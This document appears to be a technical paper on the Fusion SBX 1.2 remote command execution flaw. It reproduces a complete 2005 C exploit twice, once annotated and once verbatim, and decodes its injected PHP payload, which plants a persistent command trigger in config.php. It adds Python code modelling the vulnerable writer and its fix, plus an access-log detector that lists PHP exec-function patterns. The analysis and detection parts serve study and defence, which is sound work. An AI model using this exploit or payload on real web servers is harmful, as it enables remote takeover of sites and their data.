Understanding Fusion SBX 1.2 Remote Command Execution Exploit

What this paper is
This paper details a security vulnerability in Fusion SBX version 1.2 and provides a C exploit program to demonstrate remote command execution. The vulnerability allows an attacker to inject and execute arbitrary PHP functions on a vulnerable web server, effectively gaining control over the server with the privileges of the web server process.
Simple technical breakdown
Fusion SBX 1.2 and earlier stores the values submitted on its admin settings page without validating them, writing them into a PHP configuration file (config.php, according to the exploit's own header comment) that the application later includes and executes. A value that should be a plain number can therefore carry PHP code. The exploit crafts an HTTP POST request to that settings page and places such code in the maxname2 parameter. The injected code calls a chosen PHP function (system, exec, or passthru) with a command supplied by the attacker in a GET parameter named sile, so every later request carrying that parameter runs the command.
Complete code and payload walkthrough
The provided C code is a client-side exploit that sends a crafted HTTP request to a vulnerable Fusion SBX installation.
/*****************************************************
* *
* [Fusion SBX <= 1.2] exploit *
* *
* sileFSBXxpl *
* *
* This exploit use vulnerability found into *
* Fusion SBX and create new variable and call it *
* with a malicious function (stored in config.php). *
* This exploit utilize injection of three diverse *
* procedures for execution of arbitrary code on *
* vulnerable machine with httpd privileges. *
* *
* References: www.securityfocus.org/bid/13575 *
* *
* coded by: Silentium of Anacron Group Italy *
* date: 10/05/2005 *
* e-mail: anacrongroupitaly[at]autistici[dot]org *
* my_home: www.autistici.org/anacron-group-italy *
* *
* this tool is developed under GPL license *
* no(c) .:. copyleft *
* *
*****************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of web server
- Header Comments: These comments provide metadata about the exploit, including its name (sileFSBXxpl), the target software (Fusion SBX <= 1.2), the vulnerability type (Remote Command Execution), author, date, contact information, and licensing (GPL).
- Includes: Standard C headers for input/output (stdio.h), general utilities (stdlib.h), system data types (sys/types.h), socket programming (sys/socket.h), internet address structures (netinet/in.h), and host name resolution (netdb.h). The code also calls memset, memcpy and strlen (declared in string.h) and shutdown and close (declared in unistd.h) without including those headers; compilers of the time accepted the implicit declarations, current ones warn about or reject them.
- #define PORT 80: Defines the default HTTP port; there is no option to change it at run time.
void info(void);
void banner(void);
void sendxpl(FILE *out, char *argv[], int type);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);
- Function Prototypes: Declares the functions used in the program. info displays usage instructions, banner shows the exploit's title, sendxpl sends the actual exploit payload, and the err* functions handle specific error conditions.
int main(int argc, char *argv[]){
FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;
if(argc!=4)
info();
type = atoi(argv[3]);
if(type < 1 || type > 3)
info();
banner();
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
errsock();
printf("[*] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == NULL)
errgeth();
printf("[*] Resolving victim host [OK]\n");
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
errconn(argv);
printf("[*] Connecting at victim host [OK]\n");
out = fdopen(sock,"a");
setbuf(out,NULL);
sendxpl(out,argv,type);
printf("[*] Now test at execute code on\n\n"
"[1] %s%sindex.php?sile=id\n"
"[2] %s%sadmin/index.php?sile=id\n\n",argv[1],argv[2],argv[1],argv[2]);
shutdown(sock,2);
close(sock);
return 0;
}
main function:
- Argument Check: if(argc!=4) info(); Checks that exactly four command-line arguments (program name, victim host, path, type) were given; if not, info() is called to display usage and exit.
- Exploit Type: type = atoi(argv[3]); if(type < 1 || type > 3) info(); Converts the third argument (exploit type) to an integer and validates that it is 1, 2, or 3.
- Banner: banner(); Displays the exploit's title and author information.
- Socket Creation: if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0) errsock(); Creates a TCP socket. If that fails, errsock() is called.
- Host Resolution: if((hp = gethostbyname(argv[1])) == NULL) errgeth(); Resolves the target hostname (argv[1]) to an IP address using gethostbyname. If that fails, errgeth() is called.
- Address Setup: memset(&addr,0,sizeof(addr)); memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); Initializes the sockaddr_in structure with the resolved IP address and the port (default 80).
- Connection: sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr)); if(sockconn < 0) errconn(argv); Connects the socket to the target web server. If that fails, errconn() is called.
- File Descriptor: out = fdopen(sock,"a"); setbuf(out,NULL); Wraps the socket file descriptor in a stdio stream (FILE *) for easier writing and disables buffering so that each fprintf is sent immediately.
- Exploit Sending: sendxpl(out,argv,type); Calls sendxpl to construct and send the malicious HTTP request.
- Output: Prints suggested URLs for testing the command execution. The program never reads the server's response, so "[OK]" only means the request was written, not that the server accepted it.
- Cleanup: shutdown(sock,2); close(sock); Closes the socket connection.
void info(void){
system("clear");
printf("\n #########################################\n"
" # sileFSBXxpl #\n"
" # ################################### #\n"
" # Fusion SBX <= 1.2 exploit #\n"
" # Remote Command Execution #\n"
" # coded by Silentium #\n"
" # [ Anacron Group Italy ] #\n"
" # ################################### #\n"
" # www.autistici.org/anacron-group-italy #\n"
" #########################################\n\n"
" [Usage]\n\n"
" sileFSBXxpl <victim> <path_sbx> <type>\n\n"
" [Type]\n\n"
" 1) injection of system()\n"
" 2) injection of exec()\n"
" 3) injection of passthru()\n\n"
" [Example]\n\n"
" sileFSBXxpl www.victim.com /sbx/ 1\n\n");
exit(1);
}
info function:
- Clears the screen (system("clear");).
- Prints a detailed banner with the exploit's name, target, author, and contact information.
- Explains the command-line usage: <victim>, <path_sbx>, and <type>.
- Details the three exploit types, corresponding to the PHP functions system(), exec(), and passthru().
- Provides an example usage.
- Exits the program.
void banner(void){
system("clear");
printf("[-] sileFSBXxpl\n"
" ============\n"
"[-] Fusion SBX <= 1.2 exploit\n"
"[-] coded by Silentium - Anacron Group Italy\n"
"[-] www.autistici.org/anacron-group-italy\n\n");
}
banner function:
- Clears the screen.
- Prints a concise banner with the exploit's name, target version, author, and website.
void sendxpl(FILE *out, char *argv[], int type){
char *call;
int size = 245;
if(type == 1)
call = "system";
else if(type == 2)
call = "exec";
else if(type == 3)
call = "passthru";
size+=strlen(call);
fprintf(out,"POST %sadmin/?settings HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&"
"refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess"
"2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1"
"&setsubmit=Commit+Changes&is_logged=1\n\n",argv[2],argv[1],size,call);
printf("[*] Sending exploit [OK]\n\n");
}
sendxpl function:
- Function Selection: if(type == 1) call = "system"; else if(type == 2) call = "exec"; else if(type == 3) call = "passthru"; Sets a char pointer, call, to the name of the PHP function to be injected, based on the type argument (main has already rejected any other value, so call is always assigned).
- Content-Length Calculation: size+=strlen(call); Adds the length of the chosen function name to the hard-coded constant 245 to produce the Content-Length header. The constant is the author's hand count of the fixed part of the POST body, so the header is only as accurate as that count.
- HTTP POST Request Construction: POST %sadmin/?settings HTTP/1.0 targets admin/?settings under the supplied SBX directory, the administrative settings page of Fusion SBX. Host: %s names the target host. Content-Type: application/x-www-form-urlencoded indicates the body is URL-encoded form data. Content-Length: %d carries the calculated length of the POST data.
- POST Data: set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1&setsubmit=Commit+Changes&is_logged=1 The critical field is maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29 (the doubled %% is how a literal % is written inside a printf format string, so the bytes on the wire are the usual %3B, %40 and so on). Decoded: %3B is ; (semicolon), %40 is @ (at sign), %s is where the chosen PHP function name (call) is inserted, %28 is ( (opening parenthesis), %24_GET%5Bsile%5D is $_GET[sile], a reference to a GET parameter named sile, and %29 is ) (closing parenthesis).
- Vulnerability Explanation: Fusion SBX takes the value of maxname2 and, because it does not validate it as a number, writes it into a PHP source file (config.php, according to the exploit's header comment) that is later executed. The injected value 30;@function_name($_GET[sile]) therefore becomes PHP code: the 30; completes the assignment the setting was meant to hold, and @function_name($_GET[sile]) runs the chosen function with the value of the sile GET parameter as its argument, with error output suppressed.
- Exploit Sent Confirmation: Prints a message indicating the exploit has been sent.
void errsock(void){
system("clear");
printf("[x] Creating socket [FAILED]\n\n");
exit(1);
}
errsock function:
- Clears the screen.
- Prints an error message indicating socket creation failed.
- Exits the program.
void errgeth(void){
printf("[x] Resolving victim host [FAILED]\n\n");
exit(1);
}
errgeth function:
- Prints an error message indicating host resolution failed.
- Exits the program.
void errconn(char *argv[]){
printf("[x] Connecting at victim host [FAILED]\n\n",argv[1]);
exit(1);
}
// milw0rm.com [2005-05-20]
errconn function:
- Prints an error message indicating that the connection to the victim host failed. The call passes argv[1] as an extra argument, but the format string contains no %s for it, so the host name is never actually printed (harmless, though compilers warn about it).
- Exits the program.
- Comment: // milw0rm.com [2005-05-20] records the site that published the exploit and the publication date.
Payload/Shellcode Explanation:
There is no explicit shellcode in the traditional sense (raw machine code bytes). Instead, the "payload" is the crafted HTTP POST request. The actual code execution happens on the server-side within the PHP interpreter.
The injected PHP code is: 30;@function_name($_GET[sile])
- 30: A plain number. In the context of the maxname2 parameter it is presumably the maximum name length the setting normally holds; keeping it in place leaves the assignment the value is written into syntactically valid.
- ;: The PHP statement terminator. It ends the assignment that precedes the injection, so the code that follows starts as a separate statement.
- @: The PHP error control operator. It suppresses any error or notice raised while evaluating the call, which keeps the exploit quiet.
- function_name: A placeholder for one of the chosen PHP functions (system, exec, or passthru), selected by the type argument passed to the C exploit.
- ($_GET[sile]): The argument passed to the chosen function. $_GET[sile] is the value of the sile parameter of the HTTP GET request. The key is written without quotes, which the PHP versions of the time accepted as a bare constant and resolved to the string 'sile' with a notice; the @ hides that notice too.
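The decoding of maxname2 described in the sendxpl walkthrough and in the payload explanation above can be followed in code. The following is an added example (Python, not part of the original exploit or of Fusion SBX): it URL-decodes the exploit's POST body exactly as PHP fills $_POST, shows with a hypothetical reconstruction of the settings writer how an unvalidated value turns into an executable PHP statement, and places beside it the validating writer that would have closed the hole. The field-type assignments (which settings are integers, identifiers or free text) and the config.php layout are assumptions.

```python
"""Model of the Fusion SBX settings-injection flaw and a validating fix.

Added example, not code from the original exploit or from Fusion SBX.
The field names and the encoded maxname2 value come from the POST body
built in sendxpl(); the two config writers are hypothetical
reconstructions of the vulnerable pattern (raw setting pasted into PHP
source) and of the validated form that would have prevented it.
"""
import re
from urllib.parse import parse_qs

# POST body the exploit sends for type 1 (system), reconstructed from the
# format string in sendxpl() with the %% printf escapes collapsed to %.
EXPLOIT_BODY = (
    "set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&"
    "refresh2=120&maxname2=30%3B%40system%28%24_GET%5Bsile%5D%29&maxmess2=120&"
    "maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1"
    "&setsubmit=Commit+Changes&is_logged=1"
)

# Assumed types for the settings fields: those the exploit sends as plain
# numbers are treated as integers, the rest as strings.
INT_FIELDS = ("plimit2", "refresh2", "maxname2", "maxmess2", "maxlink2",
              "wordbanning2", "maxword2", "wrapstat2", "postorder2")
IDENT_FIELDS = ("set2", "admin_set2", "lang2")   # short lowercase identifiers
TEXT_FIELDS = ("noname2",)                       # free text, e.g. guest name


def parse_body(body: str) -> dict:
    """URL-decode the form body into {field: value}, as PHP fills $_POST."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def write_config_unsafe(fields: dict) -> str:
    """Hypothetical vulnerable writer: each raw value is pasted into PHP
    source. An integer field holding '30;@system($_GET[sile])' therefore
    yields '$maxname2 = 30;@system($_GET[sile]);', valid PHP that runs
    every time the generated config.php is included."""
    lines = ["<?php"]
    for name, value in fields.items():
        literal = value if name in INT_FIELDS else f'"{value}"'
        lines.append(f"${name} = {literal};")
    lines.append("?>")
    return "\n".join(lines)


def php_string_literal(value: str) -> str:
    """Single-quoted PHP literal; only backslash and quote need escaping."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def validate_settings(fields: dict) -> dict:
    """Hardened step: accept only what each setting is supposed to hold."""
    clean = {}
    for name in INT_FIELDS:
        raw = fields.get(name, "")
        if not re.fullmatch(r"[0-9]{1,6}", raw):
            raise ValueError(f"{name}: expected a small integer, got {raw!r}")
        clean[name] = int(raw)
    for name in IDENT_FIELDS:
        raw = fields.get(name, "")
        if not re.fullmatch(r"[a-z_]{1,32}", raw):
            raise ValueError(f"{name}: expected an identifier, got {raw!r}")
        clean[name] = raw
    for name in TEXT_FIELDS:
        clean[name] = fields.get(name, "")[:32]   # length cap; quoting happens on output
    return clean


def write_config_safe(fields: dict) -> str:
    """Validated writer: integers are emitted as integers, strings as
    properly quoted literals, and unknown fields (setsubmit, is_logged) are ignored."""
    lines = ["<?php"]
    for name, value in validate_settings(fields).items():
        literal = str(value) if isinstance(value, int) else php_string_literal(value)
        lines.append(f"${name} = {literal};")
    lines.append("?>")
    return "\n".join(lines)


if __name__ == "__main__":
    fields = parse_body(EXPLOIT_BODY)
    print("decoded maxname2:", fields["maxname2"])
    print(write_config_unsafe(fields))
    try:
        write_config_safe(fields)
    except ValueError as err:
        print("rejected:", err)
```

The fix is deliberately not an escaping routine applied to the injected value: a setting that is documented as a number is parsed as a number and re-emitted from the parsed integer, so there is no way for a string to reach the PHP source at all. Quoting is reserved for fields that are genuinely text.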
Execution Flow:
- The C exploit connects to the target web server.
- It sends a crafted HTTP POST request to <path_sbx>admin/?settings.
- The POST data includes a specially formatted maxname2 parameter: 30;@chosen_function($_GET[sile]).
- The vulnerable Fusion SBX application processes this request and, instead of validating maxname2 as a number, writes the raw value into a PHP file that is later executed.
- From then on, each request that includes that file makes the PHP interpreter run chosen_function(value_of_the_sile_GET_parameter).
- The attacker can then send a GET request to a URL like http://victim.com/path_to_sbx/index.php?sile=command_to_execute (or admin/index.php, depending on the path and exploit type) to see the output of their command.
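Each stage of the flow above leaves a trace in the web server's access log: the POST to admin/?settings and the follow-up GET carrying sile=. The detector below is an added example (Python, not from the original write-up) that runs over constructed sample log lines in common log format and flags the exploit's hard-coded trigger parameter, generic PHP-injection markers in any query string, and the sequence of a settings POST followed by a sile request from the same client within a time window. The sample IPs, timestamps and the five-minute window are constructed; the POST body is not logged, so the settings POST can only be correlated by URL, not inspected.

```python
"""Detect the two-stage pattern in web server access logs.

Added example, not part of the original exploit write-up. It parses
Apache/nginx common-format lines and flags (1) the exploit's trigger
parameter 'sile', (2) a query string carrying a PHP superglobal or a call
to a command-execution function, and (3) a POST to the SBX admin settings
page followed shortly by a 'sile' request from the same client. The log
lines are constructed sample data using documentation IP ranges.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote_plus, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [20/May/2005:10:01:02 +0000] "GET /sbx/index.php HTTP/1.0" 200 5120
203.0.113.5 - - [20/May/2005:10:01:09 +0000] "POST /sbx/admin/?settings HTTP/1.0" 200 812
203.0.113.5 - - [20/May/2005:10:01:15 +0000] "GET /sbx/index.php?sile=id HTTP/1.0" 200 5203
198.51.100.7 - - [20/May/2005:10:02:00 +0000] "GET /sbx/index.php?page=2 HTTP/1.1" 200 5100
198.51.100.7 - - [20/May/2005:10:02:31 +0000] "GET /sbx/admin/index.php?x=%24_GET%5Bsile%5D HTTP/1.1" 404 210
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
# The PHP functions the exploit offers (plus shell_exec), optionally prefixed with @.
EXEC_CALL_RE = re.compile(r"@?\b(system|exec|passthru|shell_exec)\s*\(", re.I)
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")


def parse_line(line: str):
    """Return a dict for one common-log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": parts.path,
        "query": parts.query,
        "status": int(m["status"]),
    }


def classify(entry: dict) -> list:
    """Per-request indicators, judged on the URL-decoded query string."""
    reasons = []
    decoded = unquote_plus(entry["query"])
    if "sile" in parse_qs(entry["query"], keep_blank_values=True):
        reasons.append("sile_parameter")             # this exploit's trigger parameter
    if SUPERGLOBAL_RE.search(decoded):
        reasons.append("php_superglobal_in_query")   # generic PHP-injection marker
    if EXEC_CALL_RE.search(decoded):
        reasons.append("php_exec_call_in_query")
    return reasons


def is_settings_post(entry: dict) -> bool:
    """POST to <path_sbx>admin/?settings, the request sendxpl() builds."""
    return (entry["method"] == "POST" and entry["path"].endswith("admin/")
            and entry["query"] == "settings")


def detect(log_text: str, window: timedelta = timedelta(minutes=5)) -> list:
    """Scan a log; return one alert per suspicious line, with its reasons."""
    alerts = []
    last_settings_post = {}          # client ip -> time of its latest settings POST
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        if is_settings_post(entry):
            last_settings_post[entry["ip"]] = entry["ts"]   # legitimate on its own
            continue
        reasons = classify(entry)
        seen = last_settings_post.get(entry["ip"])
        if "sile_parameter" in reasons and seen and entry["ts"] - seen <= window:
            reasons.append("settings_post_then_sile")
        if reasons:
            alerts.append({"ip": entry["ip"], "path": entry["path"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert["ip"], alert["path"], ", ".join(alert["reasons"]))
```

The sile_parameter rule is a signature for this one exploit and is trivially changed by editing the C source; the superglobal and exec-call rules and the settings-then-trigger correlation are the parts worth keeping, since they describe the technique rather than the tool.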
Original Exploit-DB Content (Verbatim)
/*****************************************************
* *
* [Fusion SBX <= 1.2] exploit *
* *
* sileFSBXxpl *
* *
* This exploit use vulnerability found into *
* Fusion SBX and create new variable and call it *
* with a malicious function (stored in config.php). *
* This exploit utilize injection of three diverse *
* procedures for execution of arbitrary code on *
* vulnerable machine with httpd privileges. *
* *
* References: www.securityfocus.org/bid/13575 *
* *
* coded by: Silentium of Anacron Group Italy *
* date: 10/05/2005 *
* e-mail: anacrongroupitaly[at]autistici[dot]org *
* my_home: www.autistici.org/anacron-group-italy *
* *
* this tool is developed under GPL license *
* no(c) .:. copyleft *
* *
*****************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 80 // port of web server
void info(void);
void banner(void);
void sendxpl(FILE *out, char *argv[], int type);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);
int main(int argc, char *argv[]){
FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;
if(argc!=4)
info();
type = atoi(argv[3]);
if(type < 1 || type > 3)
info();
banner();
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
errsock();
printf("[*] Creating socket [OK]\n");
if((hp = gethostbyname(argv[1])) == NULL)
errgeth();
printf("[*] Resolving victim host [OK]\n");
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
errconn(argv);
printf("[*] Connecting at victim host [OK]\n");
out = fdopen(sock,"a");
setbuf(out,NULL);
sendxpl(out,argv,type);
printf("[*] Now test at execute code on\n\n"
"[1] %s%sindex.php?sile=id\n"
"[2] %s%sadmin/index.php?sile=id\n\n",argv[1],argv[2],argv[1],argv[2]);
shutdown(sock,2);
close(sock);
return 0;
}
void info(void){
system("clear");
printf("\n #########################################\n"
" # sileFSBXxpl #\n"
" # ################################### #\n"
" # Fusion SBX <= 1.2 exploit #\n"
" # Remote Command Execution #\n"
" # coded by Silentium #\n"
" # [ Anacron Group Italy ] #\n"
" # ################################### #\n"
" # www.autistici.org/anacron-group-italy #\n"
" #########################################\n\n"
" [Usage]\n\n"
" sileFSBXxpl <victim> <path_sbx> <type>\n\n"
" [Type]\n\n"
" 1) injection of system()\n"
" 2) injection of exec()\n"
" 3) injection of passthru()\n\n"
" [Example]\n\n"
" sileFSBXxpl www.victim.com /sbx/ 1\n\n");
exit(1);
}
void banner(void){
system("clear");
printf("[-] sileFSBXxpl\n"
" ============\n"
"[-] Fusion SBX <= 1.2 exploit\n"
"[-] coded by Silentium - Anacron Group Italy\n"
"[-] www.autistici.org/anacron-group-italy\n\n");
}
void sendxpl(FILE *out, char *argv[], int type){
char *call;
int size = 245;
if(type == 1)
call = "system";
else if(type == 2)
call = "exec";
else if(type == 3)
call = "passthru";
size+=strlen(call);
fprintf(out,"POST %sadmin/?settings HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&"
"refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess"
"2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1"
"&setsubmit=Commit+Changes&is_logged=1\n\n",argv[2],argv[1],size,call);
printf("[*] Sending exploit [OK]\n\n");
}
void errsock(void){
system("clear");
printf("[x] Creating socket [FAILED]\n\n");
exit(1);
}
void errgeth(void){
printf("[x] Resolving victim host [FAILED]\n\n");
exit(1);
}
void errconn(char *argv[]){
printf("[x] Connecting at victim host [FAILED]\n\n",argv[1]);
exit(1);
}
// milw0rm.com [2005-05-20]